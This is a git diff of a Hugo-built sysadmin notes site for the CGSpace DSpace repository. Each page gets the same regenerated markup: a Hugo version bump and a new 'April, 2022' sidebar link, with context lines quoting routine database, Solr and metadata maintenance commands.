<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -38,7 +38,7 @@ http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E
Then I reduced the JVM heap size from 6144 back to 5120m
Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the Ansible infrastructure scripts to support hosts choosing which distribution they want to use
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -523,9 +523,9 @@ $ psql -h localhost -U postgres dspacetest
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -58,7 +58,7 @@ real 74m42.646s
user 8m5.056s
sys 2m7.289s
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -517,9 +517,9 @@ $ sed &#39;/^id/d&#39; 10568-*.csv | csvcut -c 1,2 &gt; map-to-cifor-archive.csv
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ During the mvn package stage on the 5.8 branch I kept getting issues with java r
There is insufficient memory for the Java Runtime Environment to continue.
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -569,9 +569,9 @@ dspace=# select count(text_value) from metadatavalue where resource_type_id=2 an
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -46,7 +46,7 @@ Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did
The server only has 8GB of RAM so we&rsquo;ll eventually need to upgrade to a larger one because we&rsquo;ll start starving the OS, PostgreSQL, and command line batch processes
I ran all system updates on DSpace Test and rebooted it
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -442,9 +442,9 @@ $ dspace database migrate ignored
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -30,7 +30,7 @@ I&rsquo;ll update the DSpace role in our Ansible infrastructure playbooks and ru
Also, I&rsquo;ll re-run the postgresql tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month
I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -748,9 +748,9 @@ UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND me
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -26,7 +26,7 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items
I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nairobi right now
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -656,9 +656,9 @@ $ curl -X GET -H &#34;Content-Type: application/json&#34; -H &#34;Accept: applic
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ Send a note about my dspace-statistics-api to the dspace-tech mailing list
Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage
Today these are the top 10 IPs:
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -553,9 +553,9 @@ $ dspace dsrun org.dspace.eperson.Groomer -a -b 11/27/2016 -d
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ Then I ran all system updates and restarted the server
I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another Ghostscript vulnerability last week
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -594,9 +594,9 @@ UPDATE 1
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -50,7 +50,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
357 207.46.13.1
903 54.70.40.11
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1264,9 +1264,9 @@ identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInter
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -72,7 +72,7 @@ real 0m19.873s
user 0m22.203s
sys 0m1.979s
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1344,9 +1344,9 @@ Please see the DSpace documentation for assistance.
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -46,7 +46,7 @@ Most worryingly, there are encoding errors in the abstracts for eleven items, fo
I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1208,9 +1208,9 @@ sys 0m2.551s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -64,7 +64,7 @@ $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u ds
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1299,9 +1299,9 @@ UPDATE 14
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -48,7 +48,7 @@ DELETE 1
But after this I tried to delete the item from the XMLUI and it is still present&hellip;
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -631,9 +631,9 @@ COPY 64871
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -34,7 +34,7 @@ Run system updates on CGSpace (linode18) and reboot it
Skype with Marie-Angélique and Abenet about CG Core v2
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -317,9 +317,9 @@ UPDATE 2
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -38,7 +38,7 @@ CGSpace
Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -554,9 +554,9 @@ issn.validate(&#39;1020-3362&#39;)
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -46,7 +46,7 @@ After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s luck
Run system updates on DSpace Test (linode19) and reboot it
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -573,9 +573,9 @@ sys 2m27.496s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -72,7 +72,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
7249 2a01:7e00::f03c:91ff:fe18:7396
9124 45.5.186.2
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -581,9 +581,9 @@ $ csv-metadata-quality -i /tmp/clarisa-institutions.csv -o /tmp/clarisa-institut
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="October, 2019"/>
<meta name="twitter:description" content="2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U&#43;00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -385,9 +385,9 @@ $ dspace import -a -c 10568/104057 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -58,7 +58,7 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -692,9 +692,9 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -46,7 +46,7 @@ Make sure all packages are up to date and the package manager is up to date, the
# dpkg -C
# reboot
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -404,9 +404,9 @@ UPDATE 1
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -56,7 +56,7 @@ I tweeted the CGSpace repository link
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -604,9 +604,9 @@ COPY 2900
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -38,7 +38,7 @@ The code finally builds and runs with a fresh install
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1275,9 +1275,9 @@ Moving: 21993 into core statistics-2019
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -42,7 +42,7 @@ You need to download this into the DSpace 6.x source and compile it
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -484,9 +484,9 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -48,7 +48,7 @@ The third item now has a donut with score 1 since I tweeted it last week
On the same note, the one item Abenet pointed out last week now has a donut with score of 104 after I tweeted it last week
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -658,9 +658,9 @@ $ psql -c &#39;select * from pg_stat_activity&#39; | wc -l
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -34,7 +34,7 @@ I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -477,9 +477,9 @@ Caused by: java.lang.NullPointerException
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ I sent Atmire the dspace.log from today and told them to log into the server to
In other news, I checked the statistics API on DSpace 6 and it&rsquo;s working
I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -811,9 +811,9 @@ $ csvcut -c &#39;id,cg.subject.ilri[],cg.subject.ilri[en_US],dc.subject[en_US]&#
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -38,7 +38,7 @@ I restarted Tomcat and PostgreSQL and the issue was gone
Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the 5_x-prod branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&rsquo;s request
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1142,9 +1142,9 @@ Fixed 4 occurences of: Muloi, D.M.
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ It is class based so I can easily add support for other vocabularies, and the te
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -798,9 +798,9 @@ $ grep -c added /tmp/2020-08-27-countrycodetagger.log
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -48,7 +48,7 @@ I filed a bug on OpenRXV: https://github.com/ilri/OpenRXV/issues/39
I filed an issue on OpenRXV to make some minor edits to the admin UI: https://github.com/ilri/OpenRXV/issues/40
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -717,9 +717,9 @@ solr_query_params = {
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -44,7 +44,7 @@ During the FlywayDB migration I got an error:
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1241,9 +1241,9 @@ $ ./delete-metadata-values.py -i 2020-10-31-delete-74-sponsors.csv -db dspace -u
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -32,7 +32,7 @@ So far we&rsquo;ve spent at least fifty hours to process the statistics and stat
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -731,9 +731,9 @@ $ ./fix-metadata-values.py -i 2020-11-30-fix-hung-orcid.csv -db dspace63 -u dspa
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ I started processing those (about 411,000 records):
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -869,9 +869,9 @@ $ query-json &#39;.items | length&#39; /tmp/policy2.json
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -50,7 +50,7 @@ For example, this item has 51 views on CGSpace, but 0 on AReS
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -688,9 +688,9 @@ java.lang.IllegalArgumentException: Invalid character found in the request targe
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -60,7 +60,7 @@ $ curl -s &#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#3
}
}
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -898,9 +898,9 @@ dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -34,7 +34,7 @@ Also, we found some issues building and running OpenRXV currently due to ecosyst
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -875,9 +875,9 @@ Also, we found some issues building and running OpenRXV currently due to ecosyst
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -44,7 +44,7 @@ Perhaps one of the containers crashed, I should have looked closer but I was in
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1042,9 +1042,9 @@ $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisti
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ I looked at the top user agents and IPs in the Solr statistics for last month an
I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&hellip; as that&rsquo;s an actual user&hellip;
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -685,9 +685,9 @@ May 26, 02:57 UTC
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ I simply started it and AReS was running again:
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -693,9 +693,9 @@ I simply started it and AReS was running again:
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -30,7 +30,7 @@ Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVO
localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -715,9 +715,9 @@ COPY 20994
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -32,7 +32,7 @@ Update Docker images on AReS server (linode20) and reboot the server:
I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -606,9 +606,9 @@ I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -48,7 +48,7 @@ The syntax Moayad showed me last month doesn&rsquo;t seem to honor the search qu
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -588,9 +588,9 @@ The syntax Moayad showed me last month doesn&rsquo;t seem to honor the search qu
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -46,7 +46,7 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
So we have 1879/7100 (26.46%) matching already
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -791,9 +791,9 @@ Try doing it in two imports. In first import, remove all authors. In second impo
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -32,7 +32,7 @@ First I exported all the 2019 stats from CGSpace:
$ ./run.sh -s http://localhost:8081/solr/statistics -f &#39;time:2019-*&#39; -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
"/>
